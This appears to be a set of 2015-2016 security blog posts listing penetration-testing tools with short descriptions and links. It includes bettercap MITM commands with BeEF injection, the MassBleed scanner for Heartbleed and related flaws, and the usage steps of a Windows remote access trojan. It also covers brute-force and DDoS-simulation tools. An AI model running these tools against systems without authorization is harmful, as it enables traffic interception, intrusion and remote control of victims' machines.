Jan 27, 2016

CheatSheet: Powershell

Source:: http://ramblingcookiemonster.github.io/images/Cheat-Sheets/powershell-cheat-sheet.pdf

Tools: HTTP Security Headers Powershell script

PowerShell script to quickly test for HTTP Security Headers.

Source:: https://pentestn00b.wordpress.com/2016/01/22/http-security-headers-script/

Dec 11, 2015

Howto: install and use bettercap in Kali 2.0

1. Install Ruby-Dev
# apt-get install ruby-dev libpcap-dev

2. Download source code bettercap
# git clone https://github.com/evilsocket/bettercap

3. Install bettercap
# cd bettercap
# gem build bettercap.gemspec
# gem install bettercap*.gem

4. Start monitor traffic and MITM
# bettercap -X -L -I eth0
-X => Sniffing
-L =>  Parse packets coming from/to the address of this computer
-I => Interface

5. Download Proxy module
#  git clone https://github.com/evilsocket/bettercap-proxy-modules

6. Using bettercap + beef
# bettercap -X -L -I eth0 --proxy-module bettercap-proxy-modules/beefbox.rb

Nov 23, 2015

Tools: Stream Detector - Alternate Data Streams (ADS) Detector

NoVirusThanks Stream Detector is a useful utility which finds all hidden Alternate Data Streams (ADS) on NTFS drives. After finding the alternate data streams, you can extract these streams, delete the file, delete unwanted streams, or export the list of found streams to a log file. This program can also list multiple hidden streams and can properly detect alternate data streams on an actual folder\directory

Source:: http://www.novirusthanks.org/products/stream-detector/

Nov 18, 2015

Tools: MassBleed - MassBleed SSL Vulnerability Scanner

USAGE: sh massbleed.sh [CIDR|IP] [single|port|subnet] [port] [proxy]
ABOUT: This script has four main functions with the ability to proxy all connections:
  1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh
  2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh port 8443)
  3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh single)
  4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES: (example: sh massbleed.sh 0 0 proxy) (example: sh massbleed.sh port 8443 proxy) (example: sh massbleed.sh single 0 proxy) (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
  1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
  2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
  3. Poodle SSLv3 vulnerability (CVE-2014-3566)
REQUIREMENTS: Is the heartbleed POC present? Is the openssl CCS script present? Is unicornscan installed? Is nmap installed? Is sslscan installed?

Source:: https://github.com/1N3/MassBleed

Nov 16, 2015

Tools: Windows Remote Access Trojan (RAT)

Windows Remote Access Trojan (RAT) using .NET Sockets
Client-server binaries and source-code for controlling a remote machine behind a NAT with a command-line shell in Windows. Although the core provides support for communication with multiple RATs, the command-line interface used has limited capabilities distinguishing each one.
The RAT process executable does not hide itself from taskbar or task manager as it was developed for educational purposes only. Please do not use for any malicious purposes.
Contains the source code and the two binaries packaged using ILMerge.

  1. Start the server in a command-line acting as the RAT (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
  2. Start the client in a command-line acting as the controller (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
  3. Issue commands from the controller.exe interface
 Source:: https://github.com/stphivos/rat-shell?utm_source=hootsuite

Tools: 0d1n - Web security tool to make fuzzing at HTTP inputs, made in C with libCurl

 0d1n is a tool for automating customized attacks against web applications.
*brute force passwords in auth forms
*diretory disclosure ( use PATH list to brute, and find HTTP status code )
*test list on input to find SQL Injection and XSS vulnerabilities
other things...

Source:: https://github.com/CoolerVoid/0d1n/

Tools: Bonesi - Simulate a HTTP GET BotNet DDoS Attack

 How does TCP Spoofing work?
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary, that all traffic from the target webserver is routed back to the host running BoNeSi
HTTP-Flooding attacks can not be simulated in the internet, because answers from the webserver must be routed back to the host running BoNeSi.

It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly.
Source:: http://cagdasulucan.blogspot.com/2012/12/how-to-simulate-http-get-botnet-ddos.html

Tools: Sn1per – Automated Pentest Recon Scanner

Sn1per is an automated open source scanner that you can use during penetration testing. the tool allow to use some compilation of pentest utility such as the harvester , nmap and brute force against your target. some of the features are:
  • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports
  • Automatically brute forces sub-domains and DNS info
  • Automatically runs targeted nmap scripts against open ports
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces all open services
Source:: https://github.com/1N3/Sn1per

Tools: Joomlavs - A black box, Ruby powered, Joomla vulnerability scanner

JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.

Source:: https://github.com/rastating/joomlavs